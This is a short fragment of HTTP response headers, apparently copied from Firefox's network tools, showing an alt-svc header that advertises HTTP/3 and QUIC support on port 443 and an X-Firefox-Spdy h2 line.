alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---